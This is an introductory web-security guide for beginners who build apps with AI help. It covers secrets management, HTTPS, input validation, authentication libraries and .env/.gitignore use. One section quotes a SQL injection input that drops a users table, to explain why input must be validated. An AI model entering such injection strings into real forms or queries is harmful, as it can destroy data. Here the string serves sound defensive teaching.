Security Basics for Vibe Coders

You don’t need to be a security expert, but you DO need to avoid common mistakes.

AI can help write secure code—if you know what to ask for.

The Golden Rules

1. Never Put Secrets in Code

Bad:


const API_KEY = "sk_live_abc123xyz789";  // ❌ NEVER DO THIS

Good:


const API_KEY = process.env.API_KEY;  // ✅ Load from environment

Why: If your code is on GitHub (even private repos), hackers scan for exposed keys.

2. Always Use HTTPS

The 🔒 in your browser URL means data is encrypted.

HTTP: Data travels in plain text (readable by anyone watching) HTTPS: Data is encrypted (only sender and receiver can read)

For your apps: Modern hosting (Vercel, Netlify) includes HTTPS automatically.

3. Validate All User Input

Never trust data from users. Ever.

Example attack: “SQL Injection”

User enters in the name field: Robert'); DROP TABLE users;--

If your backend doesn’t validate input, this could delete your entire user database.

What to tell AI:

“Add input validation to all form fields. Sanitize data before using in database queries.”

4. Use Authentication Libraries

Don’t build login systems from scratch.

Good options:

NextAuth.js (for Next.js apps)
Clerk
Auth0
Supabase Auth

What to tell AI:

“Implement authentication using [library]. Include email/password login and Google OAuth.”

Common Threats (Simplified)

Cross-Site Scripting (XSS)

What: Attacker injects malicious code that runs in other users’ browsers. Prevention: Escape/sanitize user content before displaying.

SQL Injection

What: Attacker manipulates database queries through input fields. Prevention: Use parameterized queries (most frameworks do this automatically).

Broken Authentication

What: Weak passwords, exposed sessions, no rate limiting. Prevention: Use established auth libraries, enforce strong passwords.

Exposed Sensitive Data

What: Accidentally showing private info in API responses. Prevention: Be intentional about what data you return.

Environment Variables: Your Security Friend

Environment variables keep secrets out of your code.

Creating a .env file


# .env (never commit this file!)
DATABASE_URL=postgresql://user:password@localhost:5432/mydb
API_KEY=sk_live_abc123xyz789
SECRET_KEY=super_secret_key_here

Using in code


// The value comes from .env, not hardcoded
const dbUrl = process.env.DATABASE_URL;

.gitignore (MUST HAVE)


# Never commit these files
.env
.env.local
.env.production

Security Checklist

Before launching any app:

No hardcoded passwords or API keys
HTTPS enabled
User input is validated
Authentication uses a trusted library
.env files are in .gitignore
Database queries are parameterized
Error messages don’t expose sensitive info

What to Ask AI

When building features that involve security:

For Authentication:

“Implement secure user authentication with password hashing, session management, and rate limiting for login attempts.”

For Forms:

“Add input validation for this form. Validate email format, sanitize text inputs, and limit field lengths.”

For APIs:

“Secure this API endpoint with authentication. Only allow access to users who own this resource.”

For Databases:

“Use parameterized queries for all database operations to prevent SQL injection.”

Common Mistakes to Avoid

Mistake	Consequence	Fix
API key in frontend code	Anyone can steal it	Move to backend
Weak password rules	Accounts get hacked	Enforce strong passwords
No rate limiting	Brute force attacks	Add attempt limits
Trusting user input	Data corruption, hacks	Validate everything
Logging sensitive data	Data leaks	Never log passwords/keys

When to Get Help

Security is complex. For serious apps, consider:

Code review from someone with security experience
Penetration testing for production apps
Security audits for apps handling sensitive data (payments, health info)

For personal projects and MVPs: Following this guide covers the basics.

Next Steps

→ AI-Powered IDEs — Start building with security in mind
→ Your First Project — Apply what you’ve learned